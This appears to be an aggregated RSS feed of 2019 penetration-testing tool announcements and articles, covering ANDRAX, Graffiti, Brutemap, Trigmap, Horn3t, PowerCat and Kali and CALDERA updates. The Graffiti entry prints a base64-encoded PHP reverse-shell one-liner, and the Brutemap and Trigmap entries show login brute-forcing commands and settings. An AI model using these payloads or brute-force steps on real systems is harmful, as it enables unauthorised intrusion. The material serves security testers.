Linux for Pentester: APT Privilege Escalation

In this article, we’ll talk about APT (apt-get) functionality and learn how helpful the apt command is for Linux penetration testing and how we’ll progress apt to scale the greater privilege shell. Table of Content Introduction to APT (apt-get) Major Operation performed using APT (apt-get) Exploiting APT (apt-get) Sudo Rights Lab setups for Privilege Escalation… Continue reading →
The post Linux for Pentester: APT Privilege Escalation appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/

ANDRAX v3 – The First And Unique Penetration Testing Platform For Android Smartphones

ANDRAX The first and unique Penetration Testing platform for Android smartphones.Thanks to Jessica Helena she made ANDRAX v3 possible.What is ANDRAXANDRAX is a penetration testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful than a common distribution!Why is Android so powerful?Simple, everyone has a smartphone and spends all the time with it! We have the possibility to camouflage easily in the middle of everyone, the processor architecture of most Android smartphones is ARM a modern and robust architecture extremely superior to the rest, With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, we can get in almost anywhere with our smartphones…In technical terms, ANDRAX and NetHunter should never be compared, ANDRAX is a penetration testing platform for Android smartphones and NetHunter is just a Debian emulator running with chroot.Termux is not our enemy, Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android.ANDRAX and Termux have a similar development, ANDRAX and Termux share many libs and GNU/Linux resources.But Termux is not a penetration testing platform, it’s software to bring basic tools found in a Debian environment. Penetration tests are not something basic! But advanced techniques that involve advanced tools and a advanced environment to conduct good tests!So you can install many tools manually in Termux but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing.Termux runs without root privileges and this makes it very difficult to use advanced tools. Features and ToolsTool listInformation GatheringWhoisBind DNS toolsDnsreconRaccoonDNS-CrackerFirewalkScanningNmap – Network MapperMasscanSSLScanAmapPacket CraftingHping3NpingScapyHexinjectNcatSocatNetwork HackingARPSpoofBettercapMITMProxyEvilGINX2WebSite Hacking0d1nWapiti3Recon-NGPHPSploitPhotonXSSerCommixSQLMapPayloadmaskAbernathY-XSSPassword HackingHydraNcrackJohn The RipperCRUNCHWireless HackingVMP Evil APAircrack-NG ToolsCowpattyMDK3ReaverExploitationMetaSploit FrameworkRouterSploit FrameworkGetsploitOWASP ZSCRop-TOOLMore…Advanced TerminalAdvanced and Professional terminal emulator for Hacking!Dynamic Categories Overlay (DCO)Beautiful tools category system Advanced IDEComplete support for many programming languagesInformation GatheringTools for initial informations about the targetScanningTools for second stage: ScanningPacket CraftingTools to craft network packetsNetwork HackingTools for network hackingWebSite HackingTools for WebSite and WebApps HackingPassword HackingTools to break passwordsWireless HackingTools for Wireless HackingExploitationTools for Dev and launch exploitsMore info in official site.Download ANDRAX

Link: http://feedproxy.google.com/~r/PentestTools/~3/3jIpU7zeiJg/andrax-v3-first-and-unique-penetration.html

UPDATE: Kali Linux 2019.2 Release

PenTestIT RSS Feed
Kali Linux 2019.2, the latest and the greatest Kali Linux release is now officially available! This is the second 2019 release, which comes after Kali Linux 2019.1, that was made available in the month of February. This new release majorly focuses on Kali Linux NetHunter updates including 13 new images and added device support along withRead more about UPDATE: Kali Linux 2019.2 Release
The post UPDATE: Kali Linux 2019.2 Release appeared first on PenTestIT.

Link: http://pentestit.com/update-kali-linux-2019-2-release/

Graffiti – A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

NOTE: Never upload payloads to online checkersGraffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:PythonPerlBatchPowershellPHPBashGraffiti will also accept a language that is not currently on the list and store the oneliner into a database.FeaturesGraffiti comes complete with a database that will insert each encoded payload into it, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques:XorBase64HexROT13RawSome features of Graffiti include:Terminal drop in access, with the ability to run external commandsAbility to create your own payload JSON filesAbility to view cached payloads inside of the databaseAbility to run the database in memory for quick deletionTerminal history and saving of terminal historyAuto tab completion inside of terminalAbility to securely wipe the history files and database fileMultiple encoding techniques as mentioned aboveUsageGraffiti comes with a builtin terminal, when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and it’s own internal commands. In order to get help, you jsut have to type help or ?: ________ _____ _____.__ __ .__ / _____/___________ _/ ____\/ ____\__|/ |_|__|/ \ __\_ __ \__ \\ __\\ __\| \ __\ |\ \_\ \ | \// __ \| | | | | || | | | \______ /__| (____ /__| |__| |__||__| |__| \/ \/ v(0.1) no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminalroot@graffiti:~/graffiti# ? Command Description——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search Search for a specific payload use <payload> <coder> Use this payload and encode it using a specified coder info <payload> Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode <script-type> <coder> Encode a provided payloadroot@graffiti:~/graffiti# help Command Description——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search <phrase> Search for a specific payload use <payload> <coder> Use this payload and encode it using a specified coder info <payload> Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode <script-type> <coder> Encode a provided payloadGraffiti also comes with command line arguments for when you need a payload encoded quickly:usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD] [–create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS] [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]]] [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC] [-H] [-W] [–memory] [-mC COMMAND [COMMAND …]]optional arguments: -h, –help show this help message and exit -c CODEC, –codec CODEC specify an encoding technique (*default=None) -p PAYLOAD, –payload PAYLOAD pass the path to a payload to use (*default=None) –create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS create a payload file and store it inside of ./etc/payloads (*default=None) -l, –list list all available payloads by path (*default=False) -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]], –personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]] pass your own personal payload to use for the encoding (*default=None) -lH LISTENING-ADDRESS, –lhost LISTENING-ADDRESS pass a listening address to use for the payload (if needed) (*default=None) -lP LISTENING-PORT, –lport LISTENING-PORT pass a listening port to use for the payload (if needed) (*default=None) -u URL, –url URL pass a URL if needed by your payload (*default=None) -vC, –view-cached view the cached data already present inside of the database -H, –no-history do not store the command history (*default=True) -W, –wipe wipe the database and the history (*default=False) –memory initialize the database into memory instead of a .db file (*default=False) -mC COMMAND [COMMAND …], –more-commands COMMAND [COMMAND …] pass more external commands, this will allow them to be accessed inside of the terminal commands must be in your PATH (*default=None)Encoding a payload is simple as this:root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065Encoded Payload:————————————————–php -r ‘exec(base64_decode(“JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));’————————————————–A demo of Graffiti can be found here:InstallationOn any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:./install.shThis will install Graffiti into your system and allow you to run it from anywhere.Bugs and issuesIf you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!Download Graffiti

Link: http://feedproxy.google.com/~r/PentestTools/~3/4mCLQQpiWHw/graffiti-tool-to-generate-obfuscated.html

Brutemap – Tool That Automates Testing Accounts To The Site’s Login Page

Brutemap is an open source penetration testing tool that automates testing accounts to the site’s login page, based on Dictionary Attack. With this, you no longer need to search for other bruteforce tools and you also no longer need to ask CMS What is this? only to find parameter forms, because brutemap will do it automatically. Brutemap is also equipped with an attack method that makes it easy for you to do account checking or test forms with the SQL injection bypass authentication technique. InstallationBrutemap uses selenium to interact with the website. So, you need to install Web Driver for selenium first. See here. If you have installed the git package, you only need to clone the repository Git. Like this:$ git clone https://github.com/brutemap-dev/brutemap.gitAnd, install the required modules:$ pip install -r requirements.txt UsageFor basic use:$ python brutemap.py -t http://www.example.com/admin/login.php -u admin -p defaultTo display a list of available options:$ python brutemap.py -hYou can find examples of brutemap usage here. For more information about available options, you can visit the User’s manual.Video LinksHomepage: https://brutemap-dev.github.ioDownload: .zip (latest version) atau .tar.gz (latest version).Issue tracker: https://github.com/brutemap-dev/brutemap/issuesUser’s manual: https://github.com/brutemap-dev/brutemap/wikiDownload Brutemap

Link: http://feedproxy.google.com/~r/PentestTools/~3/HEi_Ynm05Wg/brutemap-tool-that-automates-testing.html

Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scan and especially to collect informations into a well organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.DetailsTrigmap can performs several tasks using Nmap scripting engine (NSE):Port ScanService and Version DetectionWeb Resources EnumerationVulnerability AssessmentCommon Vulnerabilities TestCommon Exploits TestDictionary Attacks Against Active ServicesDefault Credentials TestUsageTrigmap can be used in two ways:Interactive mode:trigmap [ENTER], and the script does the restNON-interactive mode:trigmap -h|–host [-tp|–tcp TCP ports] [-up|–udp UDP ports] [-f|–file file path] [-s|–speed time profile] [-n|–nic NIC] [-p|–phase phases]If you want to see the help: trigmap –help to print this helperFor more screenshots see the relative directory of the repository.Dir HierarchyCustomizationIt’s possible to customize the script by changing the value of variables at the beginning of the file. In particularly you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).################################################# PARAMETERS #################################################GENERAL_USER_LIST=’general_user_wordlist_short.txt’WIN_USER_LIST=’win_user_wordlist_short.txt’UNIX_USER_LIST=’unix_user_wordlist_short.txt’SHORT_PASS_LIST=’fasttrack.txt’LONG_PASS_LIST=’rockyou.txt’################################################# NMAP SETTING ################################################## PE (echo req), PP (timestamp-request)# you can add a port on every ping scanNMAP_PING=’-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445’NMAP_OTHER=’-sV –allports -O –fuzzy –min-hostgroup 256’SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)’SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)’SCRIPT_ARGS=”userdb=$GENERAL_USER_LIST,passdb=$SHORT_PAS S_LIST"CUSTOM_SCAN=’–max-retries 3 –min-rate 250′ # LIKE UNICORNSCANTwin BrotherThis project is very similar to Kaboom, but it has a different philosophy; infact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is the portability and the efficient, but it’s recommended to use both the tools to scan the targets in a such way to gather more evidence with different tools (redundancy and reliability).Download Trigmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

Horn3t – Powerful Visual Subdomain Enumeration At The Click Of A Mouse

Horn3t is your Nr #1 tool for exploring subdomains visually.Building on the great Sublist3r framework (or extensible with your favorite one) it searches for subdomains and generates awesome picture previews. Get a fast overview of your target with http status codes, add custom found subdomains and directly access found urls with one click.Recon your targets at blazing speedEnhance your productivity by focusing on interesting looking sitesEnumerate critical sites immediatelySting your targetInstallationInstall Google ChromeInstall requirements.txt with pip3Install requirements.txt of sublist3r with pip3Put the directory within the web server of your choiceMake sure to have the right permissionsRun horn3t.pyOr alternatively use the install.sh file with docker.Afterwards you can access the web portal under http://localhost:1337TodoBetter Scaling on FirefoxAdd Windows DockerfileDirekt Nmap Support per click on a subdomainDirekt Dirb Support per click on a subdomainGenerate PDF Reports of found subdomainsAssist with subdomain takeoverCreditsaboul3la – The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of sublist3r.TheRook – The bruteforce module was based on his script subbrute.bitquark – The Subbrute’s wordlist was based on his research dnspop.Tested on Windows 10 and Debian with Google Chrome/Chromium 73Download Horn3t

Link: http://www.kitploit.com/2019/05/horn3t-powerful-visual-subdomain.html

PowerCat -A PowerShell Netcat

The word PowerCat named from Powershell Netcat which is a new version of netcat in the form of the powershell script. In this article, we will learn about powercat which a PowerShell tool for is exploiting windows machines. Table of Content Requirement & Installations Testing PowerShell Communication Bind Shell Execute Shell Tunnelling or port forwarding… Continue reading →
The post PowerCat -A PowerShell Netcat appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/powercat-a-powershell-netcat/

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set-up our own web server for penetration testing on Ubuntu 18. Ubuntu 18 has updated with the new features. Table of Content Requirement Web Server configuration Apache PHP MySQL phpMyAdmin FTP SSH Nmap Requirement-ubuntu 18.0 Web Server Configuration The Web server is a program that uses HTTP to serve users with files forming web pages in response to requests transmitted by their HTTP clients. The Web servers can also be called dedicated computers and apparatuses. Install Apache First, we will install the Apache…. Continue reading →
The post Web Server Lab Setup for Penetration Testing appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in thisRead more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/